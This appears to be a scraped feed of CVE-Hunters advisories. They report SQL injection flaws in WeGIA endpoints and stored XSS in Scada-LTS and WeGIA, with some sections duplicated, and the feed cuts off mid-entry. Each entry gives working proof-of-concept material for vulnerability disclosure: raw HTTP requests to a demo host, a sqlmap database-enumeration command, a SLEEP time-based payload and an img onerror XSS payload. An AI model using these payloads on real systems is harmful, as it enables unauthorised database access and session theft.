>CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-54060/ https://www.cvehunters.com/p/cve-2025-54060/ <h2 id="cve-2025-54060-sql-injection-blind-time-based-vulnerability-in-idatendido_familiares-parameter-on-dependente_editarinfopessoalphp-endpoint">CVE-2025-54060: SQL Injection (Blind Time-Based) Vulnerability in <code>idatendido_familiares</code> Parameter on <code>dependente_editarInfoPessoal.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54060" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54060</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>idatendido_familiares</code> parameter of the <code>/html/funcionario/dependente_editarInfoPessoal.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>idatendido_familiares</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-54060-sql-injection-blind-time-based-vulnerability-in-idatendido_familiares-parameter-on-dependente_editarinfopessoalphp-endpoint">CVE-2025-54060: SQL Injection (Blind Time-Based) Vulnerability in <code>idatendido_familiares</code> Parameter on <code>dependente_editarInfoPessoal.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54060" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54060</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>idatendido_familiares</code> parameter of the <code>/html/funcionario/dependente_editarInfoPessoal.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>idatendido_familiares</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/html/funcionario/dependente_editarInfoPessoal.php</code></p> <p>Parameter: <code>idatendido_familiares</code></p> <p style="text-align: justify;">Save the request in <code>req.txt</code> file:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> POST /html/funcionario/dependente_editarInfoPessoal.php?id_pessoa=3&idatendido_familiares=1+AND+7539=7538 HTTP/1.1 </span></span><span class="line"><span class="cl"> Host: demo.wegia.org </span></span><span class="line"><span class="cl"> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl"> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl"> Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl"> Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl"> Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl"> Content-Length: 119 </span></span><span class="line"><span class="cl"> Origin: https://demo.wegia.org </span></span><span class="line"><span class="cl"> Connection: keep-alive </span></span><span class="line"><span class="cl"> Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1 </span></span><span class="line"><span class="cl"> Cookie: _ga_F8DXBXLV8J=GS2.1.s1751254790$o22$g1$t1751255920$j46$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=bv1jv0i5nijrv1a3dkkimbp270 </span></span><span class="line"><span class="cl"> Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl"> Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl"> Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl"> Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl"> Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl"> Priority: u=0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> nome=Maria&sobrenomeForm=Silva&gender=f&telefone=%2821%2998652-3758&nascimento=1996-04-04&nome_pai=teste&nome_mae=teste </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Then, use <code>sqlmap</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-54060/image.png" width="867" height="782" srcset="/p/cve-2025-54060/image_hu_1d34c10199db05d0.png 480w, /p/cve-2025-54060/image_hu_ce851de59c9a32ae.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="110" data-flex-basis="266px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mw78-c4f6-2hq7" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mw78-c4f6-2hq7</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-54061/ https://www.cvehunters.com/p/cve-2025-54061/ <h2 id="cve-2025-54061-sql-injection-blind-time-based-vulnerability-in-idatendido_familiares-parameter-on-dependente_editardocphp-endpoint">CVE-2025-54061: SQL Injection (Blind Time-Based) Vulnerability in <code>idatendido_familiares</code> Parameter on <code>dependente_editarDoc.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54061" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54061</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>idatendido_familiares</code> parameter of the <code>/html/funcionario/dependente_editarDoc.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>idatendido_familiares</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-54061-sql-injection-blind-time-based-vulnerability-in-idatendido_familiares-parameter-on-dependente_editardocphp-endpoint">CVE-2025-54061: SQL Injection (Blind Time-Based) Vulnerability in <code>idatendido_familiares</code> Parameter on <code>dependente_editarDoc.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54061" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54061</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>idatendido_familiares</code> parameter of the <code>/html/funcionario/dependente_editarDoc.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>idatendido_familiares</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/html/funcionario/dependente_editarDoc.php</code></p> <p>Parameter: <code>idatendido_familiares</code></p> <p style="text-align: justify;">Save the request in <code>req.txt</code> file:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> POST /html/funcionario/dependente_editarDoc.php?id_pessoa=3&idatendido_familiares=1 HTTP/1.1 </span></span><span class="line"><span class="cl"> Host: demo.wegia.org </span></span><span class="line"><span class="cl"> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl"> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl"> Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl"> Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl"> Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl"> Content-Length: 82 </span></span><span class="line"><span class="cl"> Origin: https://demo.wegia.org </span></span><span class="line"><span class="cl"> Connection: keep-alive </span></span><span class="line"><span class="cl"> Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1 </span></span><span class="line"><span class="cl"> Cookie: _ga_F8DXBXLV8J=GS2.1.s1751259204$o23$g0$t1751259204$j60$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=bv1jv0i5nijrv1a3dkkimbp270 </span></span><span class="line"><span class="cl"> Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl"> Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl"> Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl"> Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl"> Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl"> Priority: u=0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> rg=56.242.1&orgao_emissor=Uni%C3%A3o1&data_expedicao=2005-06-06&cpf=495.852.710-95 </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Then, use <code>sqlmap</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-54061/image.png" width="862" height="755" srcset="/p/cve-2025-54061/image_hu_fe6010bc9adac3a1.png 480w, /p/cve-2025-54061/image_hu_b23a08e91a8f8039.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="114" data-flex-basis="274px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g47q-vfpj-g9mr" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g47q-vfpj-g9mr</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-54062/ https://www.cvehunters.com/p/cve-2025-54062/ <h2 id="cve-2025-54062-sql-injection-vulnerability-in-id_dependente-parameter-on-profile_dependentephp-endpoint">CVE-2025-54062: SQL Injection Vulnerability in <code>id_dependente</code> Parameter on <code>profile_dependente.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54062" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54062</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id_dependente</code> parameter of the <code>/html/funcionario/profile_dependente.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id_dependente</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-54062-sql-injection-vulnerability-in-id_dependente-parameter-on-profile_dependentephp-endpoint">CVE-2025-54062: SQL Injection Vulnerability in <code>id_dependente</code> Parameter on <code>profile_dependente.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54062" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54062</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id_dependente</code> parameter of the <code>/html/funcionario/profile_dependente.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id_dependente</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/html/funcionario/profile_dependente.php</code></p> <p>Parameter: <code>id_dependente</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +AND+SLEEP(10) </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <p><img src="/p/cve-2025-54062/image.png" width="1313" height="775" srcset="/p/cve-2025-54062/image_hu_d68ef2828ab64648.png 480w, /p/cve-2025-54062/image_hu_73d0afd25a2a62ee.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="169" data-flex-basis="406px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-f53c-f6jx-cm56" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-f53c-f6jx-cm56</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7728/ https://www.cvehunters.com/p/cve-2025-7728/ <h2 id="cve-2025-7728-cross-site-scripting-xss-stored-endpoint-usersshtm-parameter-username">CVE-2025-7728: Cross-Site Scripting (XSS) Stored endpoint <code>users.shtm</code> parameter <code>username</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7728" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7728</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>users.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>username</code>parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>users.shtm</code></p><h2 id="cve-2025-7728-cross-site-scripting-xss-stored-endpoint-usersshtm-parameter-username">CVE-2025-7728: Cross-Site Scripting (XSS) Stored endpoint <code>users.shtm</code> parameter <code>username</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7728" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7728</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>users.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>username</code>parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>users.shtm</code></p> <p>Parameter: <code>username</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>username</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;">Register the payload in the <code>username</code> field at the <code>users.shtm</code> endpoint. After that, the XSS can be triggered by opening the <code>users.shtm</code> page.</p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7728/image.png" width="845" height="719" srcset="/p/cve-2025-7728/image_hu_2812788e7819ccd3.png 480w, /p/cve-2025-7728/image_hu_9abb080d9b9ab836.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="117" data-flex-basis="282px" /></p> <p><img src="/p/cve-2025-7728/image-1.png" width="1011" height="549" srcset="/p/cve-2025-7728/image-1_hu_38f8c9818a1d9d3b.png 480w, /p/cve-2025-7728/image-1_hu_5a50be6addac808c.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="184" data-flex-basis="441px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7728.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7728.md</a></p> <h2 id="finder">Finder: </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7729/ https://www.cvehunters.com/p/cve-2025-7729/ <h2 id="cve-2025-7729-cross-site-scripting-xss-stored-endpoint-usersprofilesshtm-parameter-userprofilename">CVE-2025-7729: Cross-Site Scripting (XSS) Stored endpoint <code>usersProfiles.shtm</code> parameter <code>userprofilename</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7729" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7729</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>usersProfiles.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>userprofilename</code>parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>usersProfiles.shtm</code></p><h2 id="cve-2025-7729-cross-site-scripting-xss-stored-endpoint-usersprofilesshtm-parameter-userprofilename">CVE-2025-7729: Cross-Site Scripting (XSS) Stored endpoint <code>usersProfiles.shtm</code> parameter <code>userprofilename</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7729" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7729</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>usersProfiles.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>userprofilename</code>parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>usersProfiles.shtm</code></p> <p>Parameter: <code>userprofilename</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>userprofilename</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7729/image.png" width="1013" height="541" srcset="/p/cve-2025-7729/image_hu_e21d105baa8d5ea3.png 480w, /p/cve-2025-7729/image_hu_770ae5c8de58bd9d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="449px" /></p> <p><img src="/p/cve-2025-7729/image-1.png" width="1011" height="537" srcset="/p/cve-2025-7729/image-1_hu_5d649151d977a0d6.png 480w, /p/cve-2025-7729/image-1_hu_87877a04570b6134.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="188" data-flex-basis="451px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7729.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7729.md</a></p> <h2 id="finder">Finder: </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53929/ https://www.cvehunters.com/p/cve-2025-53929/ <h2 id="cve-2025-53929-cross-site-scripting-xss-stored-endpoint-adicionar_corphp-parameter-cor">CVE-2025-53929: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_cor.php</code> parameter <code>cor</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53929" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53929</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_cor.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>cor</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page <code>cadastro_pet.php</code> is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/pet/adicionar_cor.php</code></p><h2 id="cve-2025-53929-cross-site-scripting-xss-stored-endpoint-adicionar_corphp-parameter-cor">CVE-2025-53929: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_cor.php</code> parameter <code>cor</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53929" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53929</a></em></p> </blockquote> <h2 